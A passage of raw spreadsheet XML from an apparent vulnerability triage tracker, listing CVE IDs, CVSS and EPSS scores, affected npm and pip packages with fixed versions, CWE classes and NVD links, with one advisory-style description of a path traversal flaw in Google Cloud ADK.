s="5" t="inlineStr" /><c r="M456" s="5" t="inlineStr" /><c r="N456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O456" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P456" s="5" t="inlineStr" /><c r="Q456" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R456" s="5" t="inlineStr"><is><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is></c><c r="S456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76224</t></is></c></row><row r="457"><c r="A457" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B457" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C457" s="5" t="inlineStr"><is><t>CVE-2026-76639</t></is></c><c r="D457" s="5" t="n"><v>8.699999999999999</v></c><c r="E457" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F457" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G457" s="5" t="inlineStr" /><c r="H457" s="5" t="n"><v>0.007</v></c><c r="I457" s="5" t="inlineStr" /><c r="J457" s="5" t="inlineStr" /><c r="K457" s="5" t="inlineStr" /><c r="L457" s="5" t="inlineStr" /><c r="M457" s="5" t="inlineStr" /><c r="N457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O457" s="5" t="inlineStr"><is><t>2026-08-27</t></is></c><c r="P457" s="5" t="inlineStr" /><c r="Q457" s="5" t="inlineStr"><is><t>CWE-22, CWE-306</t></is></c><c r="R457" s="5" t="inlineStr"><is><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is></c><c r="S457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76639</t></is></c></row><row r="458"><c r="A458" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C458" s="5" t="inlineStr"><is><t>CVE-2026-77111</t></is></c><c r="D458" s="5" t="n"><v>8.699999999999999</v></c><c r="E458" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F458" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G458" s="5" t="inlineStr" /><c r="H458" s="5" t="n"><v>0.005</v></c><c r="I458" s="5" t="inlineStr" /><c r="J458" s="5" t="inlineStr" /><c r="K458" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L458" s="5" t="inlineStr" /><c r="M458" s="5" t="inlineStr" /><c r="N458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P458" s="5" t="inlineStr" /><c r="Q458" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R458" s="5" t="inlineStr"><is><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is></c><c r="S458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t></is></c></row><row r="459"><c r="A459" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B459" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C459" s="5" t="inlineStr"><is><t>CVE-2026-77393</t></is></c><c r="D459" s="5" t="n"><v>8.699999999999999</v></c><c r="E459" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F459" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G459" s="5" t="inlineStr" /><c r="H459" s="5" t="n"><v>0.005</v></c><c r="I459" s="5" t="inlineStr" /><c r="J459" s="5" t="inlineStr" /><c r="K459" s="5" t="inlineStr" /><c r="L459" s="5" t="inlineStr" /><c r="M459" s="5" t="inlineStr" /><c r="N459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O459" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P459" s="5" t="inlineStr" /><c r="Q459" s="5" t="inlineStr"><is><t>CWE-276</t></is></c><c r="R459" s="5" t="inlineStr"><is><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is></c><c r="S459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77393</t></is></c></row><row r="460"><c r="A460" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B460" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C460" s="5" t="inlineStr"><is><t>CVE-2026-78677</t></is></c><c r="D460" s="5" t="n"><v>8.699999999999999</v></c><c r="E460" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F460" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G460" s="5" t="inlineStr" /><c r="H460" s="5" t="n"><v>0.004</v></c><c r="I460" s="5" t="inlineStr" /><c r="J460" s="5" t="inlineStr" /><c r="K460" s="5" t="inlineStr" /><c r="L460" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M460" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N460" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O460" s="5" t="inlineStr" /><c r="P460" s="5" t="inlineStr" /><c r="Q460" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R460"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S460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t></is></c></row><row r="461"><c r="A461" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B461" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C461" s="5" t="inlineStr"><is><t>CVE-2026-78681</t></is></c><c r="D461" s="5" t="n"><v>8.699999999999999</v></c><c r="E461" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F461" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G461" s="5" t="inlineStr" /><c r="H461" s="5" t="n"><v>0.003</v></c><c r="I461" s="5" t="inlineStr" /><c r="J461" s="5" t="inlineStr" /><c r="K461" s="5" t="inlineStr" /><c r="L461" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M461" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N461" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O461" s="5" t="inlineStr" /><c r="P461" s="5" t="inlineStr" /><c r="Q461" s="5" t="inlineStr"><is><t>CWE-776</t></is></c><c r="R461"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S461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t></is></c></row><row r="462"><c r="A462" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B462" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C462" s="5" t="inlineStr"><is><t>CVE-2026-78682</t></is></c><c r="D462" s="5" t="n"><v>8.699999999999999</v></c><c r="E462" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F462" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G462" s="5" t="inlineStr" /><c r="H462" s="5" t="n"><v>0.003</v></c><c r="I462" s="5" t="inlineStr" /><c r="J462" s="5" t="inlineStr" /><c r="K462" s="5" t="inlineStr" /><c r="L462" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M462" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N462" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O462" s="5" t="inlineStr" /><c r="P462" s="5" t="inlineStr" /><c r="Q462" s="5" t="inlineStr"><is><t>CWE-441, CWE-918</t></is></c><c r="R462"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S462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t></is></c></row><row r="463"><c r="A463" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B463" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C463" s="5" t="inlineStr"><is><t>CVE-2026-79707</t></is></c><c r="D463" s="5" t="n"><v>8.699999999999999</v></c><c r="E463" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F463" s="5" t="inlineStr"><is><t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t></is></c><c r="G463" s="5" t="inlineStr" /><c r="H463" s="5" t="n"><v>0.004</v></c><c r="I463" s="5" t="inlineStr" /><c r="J463" s="5" t="inlineStr" /><c r="K463" s="5" t="inlineStr" /><c r="L463" s="5" t="inlineStr" /><c r="M463" s="5" t="inlineStr" /><c r="N463" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O463" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P463" s="5" t="inlineStr" /><c r="Q463" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R463" s="5" t="inlineStr"><is><t>A Path Traversal vulnerability in the builder endpoint in Google Cloud Agent Development Kit (ADK) versions 1.9.0 through 1.21.0 on Python allows an unauthenticated remote attacker to read arbitrary files using a crafted file_path query parameter.</t></is></c><c r="S463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79707</t></is></c></row><row r="464"><c r="A464" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B464" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C464" s="5" t="inlineStr"><is><t>CVE-2026-80205</t></is></c><c r="D464" s="5" t="n"><v>8.699999999999999</v></c><c r="E464" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F464" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G464" s="5" t="inlineStr" /><c r="H464" s="5" t="n"><v>0.005</v></c><c r="I464" s="5" t="inlineStr" /><c r="J464" s="5" t="inlineStr" /><c r="K464" s="5" t="inlineStr" /><c r="L464" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M464" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N464" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O464" s="5" t="inlineStr" /><c r="P464" s="5" t="inlineStr" /><c r="Q464" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="R464"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S464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t></is></c></row><row r="465"><c r="A465" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C465" s="5" t="inlineStr"><is><t>CVE-2026-80219</t></is></c><c r="D465" s="5" t="n"><v>8.699999999999999</v></c><c r="E465" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G465" s="5" t="inlineStr" /><c r="H465" s="5" t="n"><v>0.002</v></c><c r="I465" s="5" t="inlineStr" /><c r="J465" s="5" t="inlineStr" /><c r="K465" s="5" t="inlineStr" /><c r="L465" s="5" t="inlineStr" /><c r="M465" s="5" t="inlineStr" /><c r="N465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P465" s="5" t="inlineStr" /><c r="Q465" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="R465" s="5" t="inlineStr"><is><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is></c><c r="S465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t></is></c></row><row r="466"><c r="A466" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C466" s="5" t="inlineStr"><is><t>CVE-2026-82064</t></is></c><c r="D466" s="5" t="n"><v>8.699999999999999</v></c><c r="E466" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F466" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G466" s="5" t="inlineStr" /><c r="H466" s="5" t="n"><v>0.003</v></c><c r="I466" s="5" t="inlineStr" /><c r="J466" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K466" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L466" s="5" t="inlineStr" /><c r="M466" s="5" t="inlineStr" /><c r="N466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P466" s="5" t="inlineStr" /><c r="Q466" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="R466" s="5" t="inlineStr"><is><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is></c><c r="S466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t></is></c></row><row r="467"><c r="A467" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B467" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C467" s="5" t="inlineStr"><is><t>CVE-2026-82075</t></is></c><c r="D467" s="5" t="n"><v>8.699999999999999</v></c><c r="E467" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F467" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G467" s="5" t="inlineStr" /><c r="H467" s="5" t="n"><v>0.003</v></c><c r="I467" s="5" t="inlineStr" /><c r="J467" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K467" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L467" s="5" t="inlineStr" /><c r="M467" s="5" t="inlineStr" /><c r="N467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P467" s="5" t="inlineStr" /><c r="Q467" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R467" s="5" t="inlineStr"><is><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is></c><c r="S467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t></is></c></row><row r="468"><c r="A468" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B468" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C468" s="5" t="inlineStr"><is><t>CVE-2026-82882</t></is></c><c r="D468" s="5" t="n"><v>8.699999999999999</v></c><c r="E468" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F468" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G468" s="5" t="inlineStr" /><c r="H468" s="5" t="n"><v>0.003</v></c><c r="I468" s="5" t="inlineStr" /><c r="J468" s="5" t="inlineStr" /><c r="K468" s="5" t="inlineStr" /><c r="L468" s="5" t="inlineStr" /><c r="M468" s="5" t="inlineStr" /><c r="N468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O468" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P468" s="5" t="inlineStr" /><c r="Q468" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R468" s="5" t="inlineStr"><is><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is></c><c r="S468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82882</t></is></c></row><row r="469"><c r="A469" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B469" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C469" s="5" t="inlineStr"><is><t>CVE-2026-83605</t></is></c><c r="D469" s="5" t="n"><v>8.699999999999999</v></c><c r="E469" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F469" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G469" s="5" t="inlineStr" /><c r="H469" s="5" t="n"><v>0.003</v></c><c r="I469" s="5" t="inlineStr" /><c r="J469" s="5" t="inlineStr" /><c r="K469" s="5" t="inlineStr" /><c r="L469" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M469" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N469" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O469" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P469" s="5" t="inlineStr" /><c r="Q469" s="5" t="inlineStr"><is><t>CWE-91</t></is></c><c r="R469" s="5" t="inlineStr"><is><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is></c><c r="S469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t></is></c></row><row r="470"><c r="A470" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B470" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C470" s="5" t="inlineStr"><is><t>CVE-2026-83606</t></is></c><c r="D470" s="5" t="n"><v>8.699999999999999</v></c><c r="E470" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F470" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G470" s="5" t="inlineStr" /><c r="H470" s="5" t="n"><v>0.003</v></c><c r="I470" s="5" t="inlineStr" /><c r="J470" s="5" t="inlineStr" /><c r="K470" s="5" t="inlineStr" /><c r="L470" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M470" s="5" t="inlineStr"><is><t>0.9.11</t></is></c><c r="N470" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O470" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P470" s="5" t="inlineStr" /><c r="Q470" s="5" t="inlineStr"><is><t>CWE-1333, CWE-400</t></is></c><c r="R470" s="5" t="inlineStr"><is><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is></c><c r="S470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t></is></c></row><row r="471"><c r="A471" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B471" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C471" s="5" t="inlineStr"><is><t>CVE-2026-83607</t></is></c><c r="D471" s="5" t="n"><v>8.699999999999999</v></c><c r="E471" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F471" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G471" s="5" t="inlineStr" /><c r="H471" s="5" t="n"><v>0.003</v></c><c r="I471" s="5" t="inlineStr" /><c r="J471" s="5" t="inlineStr" /><c r="K471" s="5" t="inlineStr" /><c r="L471" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M471" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N471" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O471" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P471" s="5" t="inlineStr" /><c r="Q471" s="5" t="inlineStr"><is><t>CWE-91</t></is></c><c r="R471" s="5" t="inlineStr"><is><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is></c><c r="S471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t></is></c></row><row r="472"><c r="A472" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B472" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C472" s="5" t="inlineStr"><is><t>CVE-2026-83608</t></is></c><c r="D472" s="5" t="n"><v>8.699999999999999</v></c><c r="E472" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F472" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G472" s="5" t="inlineStr" /><c r="H472" s="5" t="n"><v>0.003</v></c><c r="I472" s="5" t="inlineStr" /><c r="J472" s="5" t="inlineStr" /><c r="K472" s="5" t="inlineStr" /><c r="L472" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M472" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N472" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O472" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P472" s="5" t="inlineStr" /><c r="Q472" s="5" t="inlineStr"><is><t>CWE-91</t></is></c><c r="R472" s="5" t="inlineStr"><is><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is></c><c r="S472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t></is></c></row><row r="473"><c r="A473" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B473" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C473" s="5" t="inlineStr"><is><t>CVE-2026-83609</t></is></c><c r="D473" s="5" t="n"><v>8.699999999999999</v></c><c r="E473" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F473" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G473" s="5" t="inlineStr" /><c r="H473" s="5" t="n"><v>0.003</v></c><c r="I473" s="5" t="inlineStr" /><c r="J473" s="5" t="inlineStr" /><c r="K473" s="5" t="inlineStr" /><c r="L473" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M473" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N473" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O473" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P473" s="5" t="inlineStr" /><c r="Q473" s="5" t="inlineStr"><is><t>CWE-625, CWE-91</t></is></c><c r="R473" s="5" t="inlineStr"><is><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is></c><c r="S473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t></is></c></row><row r="474"><c r="A474" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B474" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C474" s="5" t="inlineStr"><is><t>CVE-2026-83612</t></is></c><c r="D474" s="5" t="n"><v>8.699999999999999</v></c><c r="E474" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F474" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G474" s="5" t="inlineStr" /><c r="H474" s="5" t="n"><v>0.003</v></c><c r="I474" s="5" t="inlineStr" /><c r="J474" s="5" t="inlineStr" /><c r="K474" s="5" t="inlineStr" /><c r="L474" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M474" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N474" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O474" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P474" s="5" t="inlineStr" /><c r="Q474" s="5" t="inlineStr"><is><t>CWE-178, CWE-400</t></is></c><c r="R474" s="5" t="inlineStr"><is><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is></c><c r="S474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t></is></c></row><row r="475"><c r="A475" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B475" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C475" s="5" t="inlineStr"><is><t>CVE-2026-83613</t></is></c><c r="D475" s="5" t="n"><v>8.699999999999999</v></c><c r="E475" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F475" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G475" s="5" t="inlineStr" /><c r="H475" s="5" t="n"><v>0.003</v></c><c r="I475" s="5" t="inlineStr" /><c r="J475" s="5" t="inlineStr" /><c r="K475" s="5" t="inlineStr" /><c r="L475" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M475" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N475" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O475" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P475" s="5" t="inlineStr" /><c r="Q475" s="5" t="inlineStr"><is><t>CWE-407</t></is></c><c r="R475" s="5" t="inlineStr"><is><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is></c><c r="S475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t></is></c></row><row r="476"><c r="A476" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B476" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C476" s="5" t="inlineStr"><is><t>CVE-2026-83614</t></is></c><c r="D476" s="5" t="n"><v>8.699999999999999</v></c><c r="E476" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F476" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G476" s="5" t="inlineStr" /><c r="H476" s="5" t="n"><v>0.004</v></c><c r="I476" s="5" t="inlineStr" /><c r="J476" s="5" t="inlineStr" /><c r="K476" s="5" t="inlineStr" /><c r="L476" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M476" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N476" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O476" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P476" s="5" t="inlineStr" /><c r="Q476" s="5" t="inlineStr"><is><t>CWE-400, CWE-407</t></is></c><c r="R476" s="5" t="inlineStr"><is><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is></c><c r="S476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t></is></c></row><row r="477"><c r="A477" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B477" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C477" s="5" t="inlineStr"><is><t>CVE-2026-83615</t></is></c><c r="D477" s="5" t="n"><v>8.699999999999999</v></c><c r="E477" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F477" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G477" s="5" t="inlineStr" /><c r="H477" s="5" t="n"><v>0.004</v></c><c r="I477" s="5" t="inlineStr" /><c r="J477" s="5" t="inlineStr" /><c r="K477" s="5" t="inlineStr" /><c r="L477" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M477" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N477" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O477" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P477" s="5" t="inlineStr" /><c r="Q477" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R477" s="5" t="inlineStr"><is><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is></c><c r="S477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t></is></c></row><row r="478"><c r="A478" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B478" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C478" s="5" t="inlineStr"><is><t>CVE-2026-83616</t></is></c><c r="D478" s="5" t="n"><v>8.699999999999999</v></c><c r="E478" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F478" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G478" s="5" t="inlineStr" /><c r="H478" s="5" t="n"><v>0.003</v></c><c r="I478" s="5" t="inlineStr" /><c r="J478" s="5" t="inlineStr" /><c r="K478" s="5" t="inlineStr" /><c r="L478" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M478" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N478" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O478" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P478" s="5" t="inlineStr" /><c r="Q478" s="5" t="inlineStr"><is><t>CWE-91</t></is></c><c r="R478" s="5" t="inlineStr"><is><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is></c><c r="S478" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t></is></c></row><row r="479"><c r="A479" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B479" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C479" s="5" t="inlineStr"><is><t>CVE-2026-83617</t></is></c><c r="D479" s="5" t="n"><v>8.699999999999999</v></c><c r="E479" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F479" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G479" s="5" t="inlineStr" /><c r="H479" s="5" t="n"><v>0.003</v></c><c r="I479" s="5" t="inlineStr" /><c r="J479" s="5" t="inlineStr" /><c r="K479" s="5" t="inlineStr" /><c r="L479" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M479" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N479" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O479" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P479" s="5" t="inlineStr" /><c r="Q479" s="5" t="inlineStr"><is><t>CWE-625, CWE-91</t></is></c><c r="R479" s="5" t="inlineStr"><is><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is></c><c r="S479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t></is></c></row><row r="480"><c r="A480" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B480" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C480" s="5" t="inlineStr"><is><t>CVE-2026-83618</t></is></c><c r="D480" s="5" t="n"><v>8.699999999999999</v></c><c r="E480" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F480" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G480" s="5" t="inlineStr" /><c r="H480" s="5" t="n"><v>0.003</v></c><c r="I480" s="5" t="inlineStr" /><c r="J480" s="5" t="inlineStr" /><c r="K480" s="5" t="inlineStr" /><c r="L480" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M480" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N480" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O480" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P480" s="5" t="inlineStr" /><c r="Q480" s="5" t="inlineStr"><is><t>CWE-625, CWE-91</t></is></c><c r="R480" s="5" t="inlineStr"><is><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is></c><c r="S480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t></is></c></row><row r="481"><c r="A481" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B481" s="5" 